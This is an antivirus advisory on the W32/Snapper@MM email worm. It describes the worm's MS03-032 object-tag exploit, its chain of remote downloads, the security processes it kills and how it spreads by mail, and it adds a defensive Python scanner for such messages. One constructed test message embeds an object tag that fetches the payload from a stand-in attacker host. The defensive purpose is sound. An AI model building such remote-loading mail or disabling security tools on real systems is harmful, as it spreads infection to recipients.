W32/Snapper@MM

03/29/04 - W32/Snapper@MM

This detection is for a worm intended to spread to email addresses extracted from the Windows Address Book of the victim machine.

Akin to the propagation mechanism of W32/Bagle.q@MM, this worm does not spread as an email attachment. Instead, an apparently blank email message is sent. However, the HTML-formatted message contains code to exploit a Microsoft vulnerability described in security bulletin MS03-032 ("Object Tag vulnerability"). If the exploit succeeds, a remote file, BANNER.HTM, is downloaded.
BANNER.HTM contains scripting to download another remote file (HTMLHELP.CGI) to the victim machine.
This file is actually an HTML application containing a script that drops and loads a Win32 DLL (IELOAD.DLL) on the victim machine. The script drops the DLL into %WinDir%.

Please note: at the time of writing, the HTMLHELP.CGI file is not available on the remote server, so this variant of the worm is unable to propagate.
When IELOAD.DLL is loaded on the victim machine, it installs itself as a Browser Helper Object (BHO), registered under a random CLSID. It terminates the following processes if they are running:

NAVAPW32.EXE
CCAPP.EXE
OUTPOST.EXE
SPIDERML.EXE
The DLL contains its own SMTP engine to construct outgoing messages, which are sent to recipients extracted from the victim's Windows Address Book. The email messages contain HTML that loads the BANNER.HTM file as described above. The email is constructed as follows:

From: (spoofed)
Subject: Re:
Message Body: (apparently blank)
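The message characteristics above (blank HTML body, bare "Re:" subject, remote load via an object tag) can be checked at a mail gateway. The following is an added example for illustration, not code from this alert or from the antivirus vendor; it uses only the Python standard library, and the two sample messages and the attacker.invalid host name are constructed for the demonstration.

```python
import email
import re
from email import policy
from html.parser import HTMLParser


class ObjectTagScanner(HTMLParser):
    """Collect remote <object> sources and the visible text of an HTML body."""

    def __init__(self):
        super().__init__()
        self.remote_objects = []
        self.text = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        if tag == "object":
            for name, value in attrs:
                if name in ("data", "codebase") and value and re.match(r"(?i)https?://", value):
                    self.remote_objects.append(value)

    def handle_data(self, data):
        self.text.append(data)


def scan_message(raw: bytes) -> dict:
    """Flag a message that matches the Snapper mail pattern: two or more indicators."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    if body is None:  # plain-text mail cannot carry the object tag
        return {"suspicious": False, "reasons": [], "remote_objects": []}
    scanner = ObjectTagScanner()
    scanner.feed(body.get_content())
    reasons = []
    if scanner.remote_objects:
        reasons.append("remote <object> load: " + ", ".join(scanner.remote_objects))
    if not "".join(scanner.text).strip():
        reasons.append("HTML body renders as blank")
    if (msg["Subject"] or "").strip().lower() == "re:":
        reasons.append("bare 'Re:' subject")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons,
            "remote_objects": scanner.remote_objects}


# Constructed sample: the blank HTML mail shape described in the alert.
SAMPLE_WORM = (b"From: someone@example.invalid\r\nTo: victim@example.invalid\r\n"
               b"Subject: Re:\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\n\r\n"
               b'<html><body><object data="http://attacker.invalid/BANNER.HTM"></object></body></html>\r\n')

# Constructed sample: an ordinary HTML reply with visible text and no object tag.
SAMPLE_BENIGN = (b"From: colleague@example.invalid\r\nTo: victim@example.invalid\r\n"
                 b"Subject: Re: meeting\r\nMIME-Version: 1.0\r\nContent-Type: text/html\r\n\r\n"
                 b"<html><body><p>See you at 10.</p></body></html>\r\n")
```

A single indicator on its own (a "Re:" subject, for instance) is common in legitimate mail, so the check only reports when two or more line up.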


More info on this worm:
http://vil.nai.com/vil/content/v_101138.htm

Removal Instructions

Go to the following website for removal instructions:

http://vil.nai.com/vil/content/v_101138.htm

Download Stinger to Scan for infection:
http://vil.nai.com/vil/stinger
